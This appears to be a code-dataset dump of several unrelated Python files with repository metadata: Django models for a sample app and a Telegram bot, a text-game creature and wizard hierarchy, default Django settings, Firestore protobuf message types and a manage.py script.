233021bb5d02ef49c79cadfa8aa011b31b2e5f41 | 9ff35175433721aa159bf3f3d5bf48aae8f6a4f8 | /myapp/models.py | f64e1791e431443ad35583fbf6481911a8029289 | [] | no_license | karthikraja34/django-sample_project- | 92d0433145cc96c2de6383f9f32a0a554013343d | 935da535c2b4dc503727720539cb54059ff59c9b | refs/heads/master | 2020-03-23T13:50:50.429859 | 2018-07-19T13:21:44 | 2018-07-19T13:21:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | from django.db import models
class Entry(models.Model):
name = models.CharField(max_length = 100)
date = models.DateTimeField()
description = models.TextField()
created = models.DateTimeField(auto_now_add=True)
def __str__(self):
return '{} {}'.format(self.name,self.date)
| [
"rajakarthik131@gmail.com"
] | rajakarthik131@gmail.com |
bf0e89240f4f37a580aab9569f8991173681907d | 8b28095954e5e0e08e5134add10f4cdb3dc43328 | /days/13-15 textgames/actors.py | d0267fa0661b8d1147aa6028a5b21846aefa9707 | [] | no_license | thompsta/100daysofcode-python | 35bfe4305f33548ed7d8bce6a76f88460f687783 | 7678e594ed64312590a0f30bb8c33b60aba13791 | refs/heads/master | 2021-01-06T17:52:03.147599 | 2020-02-29T01:45:11 | 2020-02-29T01:45:11 | 241,425,356 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,274 | py | import random
# classes are blueprints of the objects we want to create
# every method has the __init__ self, assign new fields (characteristics) with self
class Creature:
def __init__(self, name, level):
self.name = name
self.level = level
# add new behaviors (methods) with new functions within the class
def defensive_roll(self):
roll = random.randint(1, 12)
return roll * self.level
# pass the Creature class as parameter so that you can inherit Creature characteristics
class Dragon(Creature):
def __init__(self, name, level, scaliness, breaths_fire):
# use super() to reference Creature characteristics
super().__init__(name, level)
# storing additional characteristics
self.scaliness = scaliness
self.breaths_fire = breaths_fire
def defensive_roll(self):
# can also use super() to call methods from Creature class
roll = super().defensive_roll()
value = roll * self.scaliness
if self.breaths_fire:
value = value * 2
return value
class Wizard(Creature):
def attack(self, creature):
my_roll = self.defensive_roll()
their_roll = creature.defensive_roll()
return my_roll >= their_roll
| [
"noreply@github.com"
] | noreply@github.com |
bdceae09f3f12e2c784454982314c598267c7550 | d1d626e557cc3ec2068734c464afdde6d0b44a92 | /bot/models.py | 70d55805aa7993b986707e1145d34e9f2b759e43 | [] | no_license | akhad97/Telegram-Bot | d279899f1cacebdb3317f2084047beaa4507c0fb | fd999c03b7b1abd2d433efcd67d9047430c66e4a | refs/heads/master | 2023-07-02T06:53:41.697269 | 2021-08-03T17:41:07 | 2021-08-03T17:41:07 | 352,558,410 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,104 | py | from django.db import models
class TelegramUser(models.Model):
user_id = models.CharField(max_length=30)
full_name = models.CharField(max_length=100)
phone_number = models.CharField(max_length=15, null=True)
resume = models.CharField(max_length=100, null=True)
# resume = models.FileField(upload_to="resume/%Y/%m", null=True)
class Meta:
verbose_name = 'TelegramUser'
verbose_name_plural = 'TelegramUsers'
def __str__(self):
return self.full_name
class Vacancy(models.Model):
name = models.CharField(max_length=100, null=True, blank=True)
def __str__(self):
return self.name
# class Language(models.Model):
# vacancy = models.ForeignKey(Vacancy, on_delete=models.CASCADE)
# name = models.CharField(max_length=50)
# code = models.CharField(max_length=30)
class Post(models.Model):
user = models.ForeignKey(TelegramUser, on_delete=models.CASCADE, null = True)
vacancy = models.ForeignKey(Vacancy, on_delete=models.CASCADE, null = True)
def __str__(self):
return self.user.full_name | [
"ahadjon.abdullaev1997@gmail.com"
] | ahadjon.abdullaev1997@gmail.com |
7174ae4f6fc58d37b2db7961201abda58c6e5f29 | 2afb2a5b8e77d6ec9d15f9b72e6873045dc168d9 | /Player.py | 0d074ea891b20f1f6f0d678a654815cf7434c6bd | [] | no_license | EnmanuelA/Program_5 | 23fdee6940ab921d32d8c1b3e2d8b0d2c5db1196 | 0bfb52d367d8bd1ad972f37578f1dfda1ed30b09 | refs/heads/master | 2016-09-14T05:11:45.072675 | 2016-04-26T02:19:33 | 2016-04-26T02:19:33 | 57,090,627 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,307 | py | from Treasure import *
from Level import *
class Player:
def __init__(self, current_level):
self.__displacements = {"h":(-1, 0), "k":(0,1), "j":(0,-1), "l":(1,0)}
self.__current_level = current_level
self.__location = current_level.get_up_point()
# the player comes with nothing to the world
self.__inventory = []
# health is 100 when we first start
self.__health = 100
def move(self, command):
if command == "h":
(dx, dy) = (-1, 0)
elif command == "k":
(dx, dy) = (0,1)
elif command == "j":
(dx, dy) = (0,-1)
elif command == "l":
(dx, dy) = (1,0)
# (dx,dy) = self.__displacements(command)
new_x = self.__location[0] + dx
new_y = self.__location[1] + dy
# ask if new location is good
if self.__current_level.is_valid_location(new_x, new_y):
self.__location = (new_x, new_y)
outStr = "OK"
else:
outStr = "You can't go there"
return outStr
def set_location(self, location):
self.__location = location
def get_location(self):
return self.__location
def pick_up(self, obj):
# add the object to inventory
self.__inventory.append(obj)
print("You picked up and object")
obj.pick_up()
def print_inventory(self):
obj_index = 1
for obj in self.__inventory:
print("(" + str(obj_index) + ")\t" + str(obj))
obj_index += 1
#-------------------------------------
# to be done
#-------------------------------------
def look_at(self):
return resultStr
def eat(self, obj_index):
return resultStr
def drop(self, obj_index):
resultStr = "You can't drop that!"
# make sure that the index is valid. If it is,
# then update inventory, object status, and
# change return to --> You dropped [object description]
return resultStr
def wear(self, obj_index):
resultStr = "You can't wear that!"
# make sure that the player is not already wearing.
# make sure that the index is valid. If it is,
# then update inventory, object status, and
# change return to --> You now wearing [object description]
return resultStr
def remove(self):
resultStr = "You are not wearing anything!"
# make sure that player is wearing an armor.
# then update inventory, object status, and
# change return to --> You removed [object description]
return resultStr
def unwield(self):
resultStr = "You are not wielding anything!"
# make sure that player is wielding a weapon.
# then update inventory, object status, and
# change return to --> You removed [object description]
return resultStr
def equip(self):
resultStr = "OK."
# make the player wear the first armor on inventory list
# (if not already wearing one) and wield the first weapon
# on the inventory list (if not already wielding one).
return resultStr
| [
"enmanunm@my.uri.edu"
] | enmanunm@my.uri.edu |
db38dd76b0fceae10b1ca8bae0bbb2be88eebc4c | a4be06af5b3997ca882d45d2ed63c80d7e4488fa | /prmgt/settings.py | 1afebdc348d84d879773138545d0290536c2a421 | [] | no_license | pyrephyo/prmgt | c7834639320ffed421cbf52f699f4ceabab12dca | b2b7e7d56274958bea3d30a5e109f6123d4878c2 | refs/heads/master | 2021-01-20T20:18:53.632861 | 2016-08-10T21:39:41 | 2016-08-10T21:39:41 | 65,244,557 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,091 | py | """
Django settings for prmgt project.
Generated by 'django-admin startproject' using Django 1.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'jfy*l5ixm10eu!_1#!ntvirfdszdvmv-9l1h1hdcr)67t6('
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'prmgt.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'prmgt.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
| [
"nkolson@pyrephyo.se"
] | nkolson@pyrephyo.se |
f35c47216bf7bbfc65746823ab7740447c6a723d | bb3306f1f19847f43aa9aa511426379d9ed4ae60 | /google/cloud/firestore_v1/types/common.py | b03242a4a8c4c8e3c6dc014396bbf604146739c1 | [
"Apache-2.0"
] | permissive | chrisrossi/python-firestore | a6b413d71e4c3394de815c2d73ab705c686821d1 | 0ae32cea8aa344825d29cc040069777162647780 | refs/heads/master | 2023-03-13T07:31:22.079376 | 2021-02-23T16:06:23 | 2021-02-23T16:06:23 | 296,692,413 | 0 | 0 | Apache-2.0 | 2020-09-18T17:50:28 | 2020-09-18T17:50:22 | null | UTF-8 | Python | false | false | 3,580 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.protobuf import timestamp_pb2 as timestamp # type: ignore
__protobuf__ = proto.module(
package="google.firestore.v1",
manifest={"DocumentMask", "Precondition", "TransactionOptions",},
)
class DocumentMask(proto.Message):
r"""A set of field paths on a document. Used to restrict a get or update
operation on a document to a subset of its fields. This is different
from standard field masks, as this is always scoped to a
[Document][google.firestore.v1.Document], and takes in account the
dynamic nature of [Value][google.firestore.v1.Value].
Attributes:
field_paths (Sequence[str]):
The list of field paths in the mask. See
[Document.fields][google.firestore.v1.Document.fields] for a
field path syntax reference.
"""
field_paths = proto.RepeatedField(proto.STRING, number=1)
class Precondition(proto.Message):
r"""A precondition on a document, used for conditional
operations.
Attributes:
exists (bool):
When set to ``true``, the target document must exist. When
set to ``false``, the target document must not exist.
update_time (~.timestamp.Timestamp):
When set, the target document must exist and
have been last updated at that time.
"""
exists = proto.Field(proto.BOOL, number=1, oneof="condition_type")
update_time = proto.Field(
proto.MESSAGE, number=2, oneof="condition_type", message=timestamp.Timestamp,
)
class TransactionOptions(proto.Message):
r"""Options for creating a new transaction.
Attributes:
read_only (~.common.TransactionOptions.ReadOnly):
The transaction can only be used for read
operations.
read_write (~.common.TransactionOptions.ReadWrite):
The transaction can be used for both read and
write operations.
"""
class ReadWrite(proto.Message):
r"""Options for a transaction that can be used to read and write
documents.
Attributes:
retry_transaction (bytes):
An optional transaction to retry.
"""
retry_transaction = proto.Field(proto.BYTES, number=1)
class ReadOnly(proto.Message):
r"""Options for a transaction that can only be used to read
documents.
Attributes:
read_time (~.timestamp.Timestamp):
Reads documents at the given time.
This may not be older than 60 seconds.
"""
read_time = proto.Field(
proto.MESSAGE,
number=2,
oneof="consistency_selector",
message=timestamp.Timestamp,
)
read_only = proto.Field(proto.MESSAGE, number=2, oneof="mode", message=ReadOnly,)
read_write = proto.Field(proto.MESSAGE, number=3, oneof="mode", message=ReadWrite,)
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"noreply@github.com"
] | noreply@github.com |
2f64d7cf2311b03b78ca148517b429f7ebaa4ead | 0384ab5eadd5f65ea92dc29535e389b3e5fe26e7 | /manage.py | ac9f6b57e9cbdea0f9941bca10bd177d68048f0d | [] | no_license | nathanjh-28/finch_collector | e1ebcdd93bf2d23f7b60fffede68e3971b288d77 | 37a07f3ef844f2ab776c48f3331e7dcb0704cd27 | refs/heads/master | 2023-07-30T19:47:43.139025 | 2020-07-30T00:08:08 | 2020-07-30T00:08:08 | 283,627,869 | 0 | 0 | null | 2021-06-10T19:59:04 | 2020-07-30T00:07:06 | Python | UTF-8 | Python | false | false | 643 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'finch_collector_project.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"nathan@nathanjharris.com"
] | nathan@nathanjharris.com |
c2646e175f2eac6aae45ccfa0d6697077523a4e4 | 8b2e3bf1c2db556d0ca95e60f27c224afaf4cda1 | /potnanny/apps/messenger/__init__.py | e9932c7aabdbb6a3d3609416d0ff6fa6a170f7f0 | [] | no_license | greeneryguru/potnanny-web | 96fe724ba3e9caed5d25578bdf40be0e896e2f81 | c4ca8b108c4b67b35c4b05db1fc57a6b53407c4e | refs/heads/master | 2021-01-24T02:45:13.301249 | 2018-03-12T13:54:33 | 2018-03-12T13:54:33 | 99,291,379 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 29 | py | from .views import messenger | [
"jeffreyleary@Jeffreys-MacBook-Air.local"
] | jeffreyleary@Jeffreys-MacBook-Air.local |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.